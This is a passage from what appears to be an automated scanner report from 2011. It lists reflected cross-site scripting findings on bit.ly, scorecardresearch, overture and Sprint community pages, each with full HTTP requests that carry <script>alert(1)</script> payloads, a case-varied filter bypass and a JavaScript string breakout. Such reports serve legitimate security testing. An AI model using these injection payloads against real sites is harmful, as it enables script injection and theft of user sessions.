This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shorten?version=2.0.1&apiKey=R_25a57bc9fea6eef6bcb03928dd05d28d&login=reutersdotcom&callback=processBitlyURL75787<script>alert(1)</script>6092a370891&longUrl=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F04%2Fus-weather-football-idUSTRE78222D20110904&refreshUrlTimestamp=1315097313283 HTTP/1.1
Host: api.bit.ly
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _bit=4e5e58aa-0030b-0228e-cbac8fa8

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 00:50:09 GMT
Content-Type: application/javascript; charset=utf-8
Connection: keep-alive
Content-Length: 358
Etag: "5c2db80dd5e3e6ca46557b8c7b52447844cb349e"

processBitlyURL75787<script>alert(1)</script>6092a370891({"errorCode": 0, "errorMessage": "", "results": {"http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904": {"userHash": "qjnyKb", "shortKeywordUrl": "", "hash": "q7VV6y",
...[SNIP]...

5.29. http://api.bit.ly/shorten [longUrl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.bit.ly
Path:	/shorten

Issue detail

The value of the longUrl request parameter is copied into the HTML document as plain text between tags. The payload 6fd73<script>alert(1)</script>6c37e9d4b was submitted in the longUrl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shorten?version=2.0.1&apiKey=R_25a57bc9fea6eef6bcb03928dd05d28d&login=reutersdotcom&callback=processBitlyURL&longUrl=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F04%2Fus-weather-football-idUSTRE78222D201109046fd73<script>alert(1)</script>6c37e9d4b&refreshUrlTimestamp=1315097313283 HTTP/1.1
Host: api.bit.ly
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _bit=4e5e58aa-0030b-0228e-cbac8fa8

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 00:50:24 GMT
Content-Type: application/javascript; charset=utf-8
Connection: keep-alive
Content-Length: 356
Etag: "e4aae6323c61daeb31d345afaa81c9ae9ccce2b8"

processBitlyURL({"errorCode": 0, "errorMessage": "", "results": {"http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D201109046fd73<script>alert(1)</script>6c37e9d4b": {"userHash": "ooSyTz", "shortKeywordUrl": "", "hash": "q1d6Wf", "shortCNAMEUrl": "http://reut.rs/ooSyTz", "shortUrl": "http://reut.rs/ooSyTz"}}, "statusCode": "OK"})

5.30. http://api.echoenabled.com/v1/search [q parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://api.echoenabled.com
Path:	/v1/search

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload 36fdf<a>00081b2be27 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /v1/search?callback=jQuery16106635923383291811_1315097306218&q=itemsPerPage%3A5+sortOrder%3AreverseChronological+-state%3AModeratorDeleted+-state%3ASystemFlagged+-state%3AModeratorFlagged+-provider%3AContextVoice+-source%3Areuters.com+-source%3Ablogs.reuters.com++childrenof%3Ahttp%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F04%2Fus-weather-football-idUSTRE78222D20110904+36fdf<a>00081b2be27&appkey=prod.reuters.com&_=1315097329735 HTTP/1.1
Host: api.echoenabled.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Server: Yaws/1.85 Yet Another Web Server
Date: Sun, 04 Sep 2011 00:58:54 GMT
Content-Length: 161
Content-Type: application/x-javascript; charset="utf-8"

jQuery16106635923383291811_1315097306218({ "result": "error", "errorCode": "wrong_query", "errorMessage": "Parse error near: \"36fdf<a>00081b2be27\" at 299" });

5.31. http://b.scorecardresearch.com/beacon.js [c1 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 8ef90<script>alert(1)</script>12b53f97162 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=78ef90<script>alert(1)</script>12b53f97162&c2=5964888&c3=2&c4=&c5=&c6=&c15=&tm=744917 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 01:11:08 GMT
Date: Sun, 04 Sep 2011 01:11:08 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"78ef90<script>alert(1)</script>12b53f97162", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

5.32. http://b.scorecardresearch.com/beacon.js [c15 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload b5525<script>alert(1)</script>cfd9ca8e7d0 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=&c15=b5525<script>alert(1)</script>cfd9ca8e7d0&tm=744917 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 01:11:12 GMT
Date: Sun, 04 Sep 2011 01:11:12 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"b5525<script>alert(1)</script>cfd9ca8e7d0", c16:"", r:""});

5.33. http://b.scorecardresearch.com/beacon.js [c2 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload e62e9<script>alert(1)</script>9e2b676467b was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888e62e9<script>alert(1)</script>9e2b676467b&c3=2&c4=&c5=&c6=&c15=&tm=744917 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 01:11:09 GMT
Date: Sun, 04 Sep 2011 01:11:09 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"7", c2:"5964888e62e9<script>alert(1)</script>9e2b676467b", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

5.34. http://b.scorecardresearch.com/beacon.js [c3 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 91ca1<script>alert(1)</script>32419e9e9c1 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=291ca1<script>alert(1)</script>32419e9e9c1&c4=&c5=&c6=&c15=&tm=744917 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 01:11:10 GMT
Date: Sun, 04 Sep 2011 01:11:10 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
y{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"7", c2:"5964888", c3:"291ca1<script>alert(1)</script>32419e9e9c1", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

5.35. http://b.scorecardresearch.com/beacon.js [c4 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 187f1<script>alert(1)</script>11f8c27111d was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=187f1<script>alert(1)</script>11f8c27111d&c5=&c6=&c15=&tm=744917 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 01:11:10 GMT
Date: Sun, 04 Sep 2011 01:11:10 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"187f1<script>alert(1)</script>11f8c27111d", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

5.36. http://b.scorecardresearch.com/beacon.js [c5 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload de650<script>alert(1)</script>9da77839bed was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=de650<script>alert(1)</script>9da77839bed&c6=&c15=&tm=744917 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 01:11:11 GMT
Date: Sun, 04 Sep 2011 01:11:11 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"de650<script>alert(1)</script>9da77839bed", c6:"", c10:"", c15:"", c16:"", r:""});

5.37. http://b.scorecardresearch.com/beacon.js [c6 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload bdb1a<script>alert(1)</script>b70cafdef9d was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=bdb1a<script>alert(1)</script>b70cafdef9d&c15=&tm=744917 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 01:11:11 GMT
Date: Sun, 04 Sep 2011 01:11:11 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"bdb1a<script>alert(1)</script>b70cafdef9d", c10:"", c15:"", c16:"", r:""});

5.38. http://cm.npc-mcclatchy.overture.com/js_1_0/ [css_url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cm.npc-mcclatchy.overture.com
Path:	/js_1_0/

Issue detail

The value of the css_url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84ec8"><script>alert(1)</script>c7d472a83b1 was submitted in the css_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js_1_0/?config=1001507650&type=news&ctxtId=news&keywordCharEnc=utf8&source=npc_mcclatchy_sacramentobee_t2_ctxt&adwd=728&adht=90&ctxtUrl=http%3A%2F%2Fblogs.sacbee.com%2Fthe_state_worker%2F%23navlink%3Dnavdrop&ctxtCat=news&outputCharEnc=latin1&css_url=http://static.mcclatchyinteractive.com/static/styles/mi/third_party/yahoo/yahoo.css84ec8"><script>alert(1)</script>c7d472a83b1&tg=1&refUrl=http%3A%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html&du=1&cb=1315097337736&ctxtContent=%3Chead%3E%3Cscript%20async%3D%22%22%20src%3D%22http%3A%2F%2Fwww.publish2.com%2Fnewsgroups%2Fstate-worker.js%3Fjsonp_callback%3DjQuery15205311797398608178_1315097321812%26amp%3B_%3D1315097336789%22%3E%3C%2Fscript%3E%3Cscript%20async%3D%22%22%20src%3D%22http%3A%2F%2Fapi.twitter.com%2F1%2Fstatuses%2Fuser_timeline.json%3Fscreen_name%3DTheStateWorker%26amp%3Bcallback%3DjQuery15205311797398608178_1315097321811%26amp%3B_%3D1315097336786%22%3E%3C%2Fscript%3E%0A%20%20%20%20%3Cscript%20type%3D%22text%2Fjavascript%22%20async%3D%22%22%20src%3D%22http%3A%2F%2Fwww.scribd.com%2Fjavascripts%2Fembed_code%2Finject.js%22%3E%3C%2Fscript%3E%3Cscript%20type%3D%22text%2Fjavascript%22%3E%0A%20%20 HTTP/1.1
Host: cm.npc-mcclatchy.overture.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=228g5ih765ieg&b=3&s=bh; UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDYyNXQxNTZ0MAZ7BMtQw=

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:03:22 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDYyM3Q0MzY0MAc4NMmAw=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Wed, 01-Sep-2021 01:03:22 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 857

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<base target="_blank">
<meta http-equiv="Content-Type" content="text/html; charse
...[SNIP]...
<link rel="stylesheet" href="http://static.mcclatchyinteractive.com/static/styles/mi/third_party/yahoo/yahoo.css84ec8"><script>alert(1)</script>c7d472a83b1" type="text/css">
...[SNIP]...

5.39. http://community.sprint.com/baw/community/buzzaboutwireless/customer-service/sprintdotcom-support [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://community.sprint.com
Path:	/baw/community/buzzaboutwireless/customer-service/sprintdotcom-support

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61c0e"><ScRiPt>alert(1)</ScRiPt>c060dbf3219 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /baw/community/buzzaboutwireless61c0e"><ScRiPt>alert(1)</ScRiPt>c060dbf3219/customer-service/sprintdotcom-support HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:19:27 GMT
Server: Apache-Coyote/1.1
X-JAL: 21
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent,Accept-Encoding
X-JSL: D=155803 t=1315099167532475
Connection: close
Content-Length: 40628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<form action="/baw/community/buzzaboutwireless61c0e"><ScRiPt>alert(1)</ScRiPt>c060dbf3219/customer-service/search.jspa" method="get" id="jive-userbar-search-form">
...[SNIP]...

5.40. http://community.sprint.com/baw/community/buzzaboutwireless/customer-service/sprintdotcom-support [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://community.sprint.com
Path:	/baw/community/buzzaboutwireless/customer-service/sprintdotcom-support

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72004"%3balert(1)//f27891277f2 was submitted in the REST URL parameter 3. This input was echoed as 72004";alert(1)//f27891277f2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /baw/community/buzzaboutwireless72004"%3balert(1)//f27891277f2/customer-service/sprintdotcom-support HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:19:28 GMT
Server: Apache-Coyote/1.1
X-JAL: 10
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent,Accept-Encoding
X-JSL: D=125450 t=1315099168721365
Connection: close
Content-Length: 40583

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
fileLoadingTooltip = "Loading user profile";
var profileErrorTooltip = "There was an error loading that profile information.";

var projectChooserUrl = "/baw/community/buzzaboutwireless72004";alert(1)//f27891277f2/customer-service/project-chooser!input.jspa";

var containerShortUrl = "/baw/container-short.jspa";
var containerLoadingTooltip = "Loading place information.";
var containerErr
...[SNIP]...

5.41. http://community.sprint.com/baw/community/buzzaboutwireless/customer-service/sprintdotcom-support [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://community.sprint.com
Path:	/baw/community/buzzaboutwireless/customer-service/sprintdotcom-support

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e620f"><ScRiPt>alert(1)</ScRiPt>df523a5d14b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /baw/community/buzzaboutwireless/customer-servicee620f"><ScRiPt>alert(1)</ScRiPt>df523a5d14b/sprintdotcom-support HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:19:34 GMT
Server: Apache-Coyote/1.1
X-JAL: 10
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent,Accept-Encoding
X-JSL: D=131245 t=1315099174578986
Connection: close
Content-Length: 40628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<form action="/baw/community/buzzaboutwireless/customer-servicee620f"><ScRiPt>alert(1)</ScRiPt>df523a5d14b/search.jspa" method="get" id="jive-userbar-search-form">
...[SNIP]...

5.42. http://community.sprint.com/baw/community/buzzaboutwireless/customer-service/sprintdotcom-support [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://community.sprint.com
Path:	/baw/community/buzzaboutwireless/customer-service/sprintdotcom-support

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0f1a"%3balert(1)//887e419074d was submitted in the REST URL parameter 4. This input was echoed as d0f1a";alert(1)//887e419074d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /baw/community/buzzaboutwireless/customer-serviced0f1a"%3balert(1)//887e419074d/sprintdotcom-support HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:19:35 GMT
Server: Apache-Coyote/1.1
X-JAL: 10
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent,Accept-Encoding
X-JSL: D=171254 t=1315099175790172
Connection: close
Content-Length: 40583

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
p = "Loading user profile";
var profileErrorTooltip = "There was an error loading that profile information.";

var projectChooserUrl = "/baw/community/buzzaboutwireless/customer-serviced0f1a";alert(1)//887e419074d/project-chooser!input.jspa";

var containerShortUrl = "/baw/container-short.jspa";
var containerLoadingTooltip = "Loading place information.";
var containerErrorTooltip = "Ther
